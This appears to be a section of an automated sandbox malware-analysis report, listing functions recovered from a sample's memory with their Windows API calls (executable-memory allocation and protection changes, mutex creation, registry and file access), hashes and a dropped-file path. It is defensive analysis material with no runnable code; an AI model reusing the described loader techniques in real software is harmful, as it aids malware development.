                                                                                                                                  • API String ID: 122021188-0
                                                                                                                                  • Opcode ID: 67333cb791c29a2c927f29a83b2f7822b3e870384029984b7057fd637250a5f1
                                                                                                                                  • Instruction ID: 79cc6fe90721df861419d6cf00eb7a7fc720b3d1b0e311be311e979132e87e19
                                                                                                                                  • Opcode Fuzzy Hash: 67333cb791c29a2c927f29a83b2f7822b3e870384029984b7057fd637250a5f1
                                                                                                                                  • Instruction Fuzzy Hash: 61F01DB2500105AFDB216F78DC4DE9A3EF8EF55396F1105A1F24AE2111DB3989609F60
                                                                                                                                  Function 0706582B Relevance: 4.6, APIs: 3, Instructions: 101memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 119 706582b-7065840 120 7065846-7065851 119->120 121 7065940-7065942 119->121 122 7065853-7065856 120->122 123 706586b-7065892 VirtualAlloc 122->123 124 7065858-706585f 122->124 123->121 125 7065898-70658a5 123->125 124->121 129 7065865-7065869 124->129 127 70658a7-70658ba 125->127 128 70658ca-7065934 VirtualProtect * 2 125->128 130 70658c0-70658c2 127->130 132 7065937-706593a 128->132 129->122 130->132 133 70658c4-70658c7 130->133 132->121 133->128
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040), ref: 0706588D
                                                                                                                                  • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07065910
                                                                                                                                  • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07065934
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2541858876-0
                                                                                                                                  • Opcode ID: 6f181bb88a94a0cb614f280f5f816ddd7c00b5ad6d6a68cbaf35a27578764d9a
                                                                                                                                  • Instruction ID: 27af3988b2ea9de96b75faac7d74f7bf3f980dfbcef0db96785dfc6e3ffe1b72
                                                                                                                                  • Opcode Fuzzy Hash: 6f181bb88a94a0cb614f280f5f816ddd7c00b5ad6d6a68cbaf35a27578764d9a
                                                                                                                                  • Instruction Fuzzy Hash: 7F3162B5A00206AFDB10DFB4CD48EAEBBF5EF44710F158259E901AB295EB75ED10CB60
                                                                                                                                  Function 07002000 Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 07002035
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 07002099
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.2498022961.0000000007002000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07002000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_7002000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3498533004-0
                                                                                                                                  • Opcode ID: 2f4cd2e719df8fe111334384f9a62bc17892a031e89252502db5d86b87ef1463
                                                                                                                                  • Instruction ID: eeadf3680fce8816b1a84905174363de9d5451d2b6f277e3f8891d287f9e3931
                                                                                                                                  • Opcode Fuzzy Hash: 2f4cd2e719df8fe111334384f9a62bc17892a031e89252502db5d86b87ef1463
                                                                                                                                  • Instruction Fuzzy Hash: CD114CB0600301EFEB616F74CD4AB593BE5FB04300F11C261A981DB6D9DA75E9008B51
                                                                                                                                  Function 07065BD6 Relevance: 3.0, APIs: 2, Instructions: 15synchronizationCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 135 7065bd6-7065bf4 wsprintfA CreateMutexA 137 7065bf6 135->137 138 7065bf8-7065bfb 135->138 137->138
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMutexwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1107950-0
                                                                                                                                  • Opcode ID: d6b265f30c0000cb4ee3c3ae0c8c3113ac972abb13f456979e58860616557185
                                                                                                                                  • Instruction ID: 5bf20dcb11a86c96fbfc81557a3fa0ee84782dbb9d45e56f7a9f264c56e93f9a
                                                                                                                                  • Opcode Fuzzy Hash: d6b265f30c0000cb4ee3c3ae0c8c3113ac972abb13f456979e58860616557185
                                                                                                                                  • Instruction Fuzzy Hash: D7D0A9B2A00210ABCF612F99EC8DA9E3FA4EF112A03018125FA159A010D23982208F80
                                                                                                                                  Function 07065F2B Relevance: 3.0, APIs: 2, Instructions: 14registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 139 7065f2b-7065f65 wsprintfA RegOpenKeyExA
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Openwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2091901810-0
                                                                                                                                  • Opcode ID: 1e61c5231248df49d06951fc93010148e91dc19ec7c0d641d84cfb8f8efadff7
                                                                                                                                  • Instruction ID: 377cfcae8c529264b4f9c146eaab5d9f9b97a059a46654f9482a84ed8025c0f2
                                                                                                                                  • Opcode Fuzzy Hash: 1e61c5231248df49d06951fc93010148e91dc19ec7c0d641d84cfb8f8efadff7
                                                                                                                                  • Instruction Fuzzy Hash: A8D05272000109EBDF029F80ED8A8EE3E6AFB04384F014402F90200022C33AC470ABA0
                                                                                                                                  Function 070651AE Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 153 70651ae-70651e4 SetErrorMode
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 070651E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                  • Opcode ID: dc6d8606d4bd64a4dbd01e39ebbdbdc26ac80f6bb412cd2facad89e04eed3d93
                                                                                                                                  • Instruction ID: 2a3ed264cf21b3d99d942d95710bc93877b227c8415a86c7e5bd8e8212393744
                                                                                                                                  • Opcode Fuzzy Hash: dc6d8606d4bd64a4dbd01e39ebbdbdc26ac80f6bb412cd2facad89e04eed3d93
                                                                                                                                  • Instruction Fuzzy Hash: 7CE0E2B1D01308EFDB51DFA4D60978EBBF0BB10308F6181A8C48163644EBB9AF08AF41

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 07065B0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\im\), ref: 07065B26
                                                                                                                                  • PathRemoveBackslashA.SHLWAPI(?), ref: 07065B2D
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065B20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BackslashPathRemovelstrcpy
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 295623078-3122922850
                                                                                                                                  • Opcode ID: fd4995a44be9dc5fca0b7df7b583dd90cbd1bb88703b5ced8d71107f1c7a9b88
                                                                                                                                  • Instruction ID: 711d9799f5b4b63593ccff720b7bbf76eeea441da7a70a56f5e72997443f2353
                                                                                                                                  • Opcode Fuzzy Hash: fd4995a44be9dc5fca0b7df7b583dd90cbd1bb88703b5ced8d71107f1c7a9b88
                                                                                                                                  • Instruction Fuzzy Hash: 6FE01AB2200209BFDB51AF94EC8AC6F3BEDEB19259B515911FA02E1122C779D8209A70
                                                                                                                                  Function 07065B50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\im\), ref: 07065B68
                                                                                                                                  • PathRemoveBackslashA.SHLWAPI(?), ref: 07065B6F
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065B62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BackslashPathRemovelstrcpy
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 295623078-3122922850
                                                                                                                                  • Opcode ID: d33a3d0af1c2dccd528ae9e2764705d67d934a0000359ccbf04a884505d6f217
                                                                                                                                  • Instruction ID: d3f38cde233a08838843537171e06c0318da4773113552ffacf6acfb71a8f0ec
                                                                                                                                  • Opcode Fuzzy Hash: d33a3d0af1c2dccd528ae9e2764705d67d934a0000359ccbf04a884505d6f217
                                                                                                                                  • Instruction Fuzzy Hash: 5AD05E732155246FDAA1BA64BC07CCE73DCEA626657028201F842E3200D2ACF620CBE4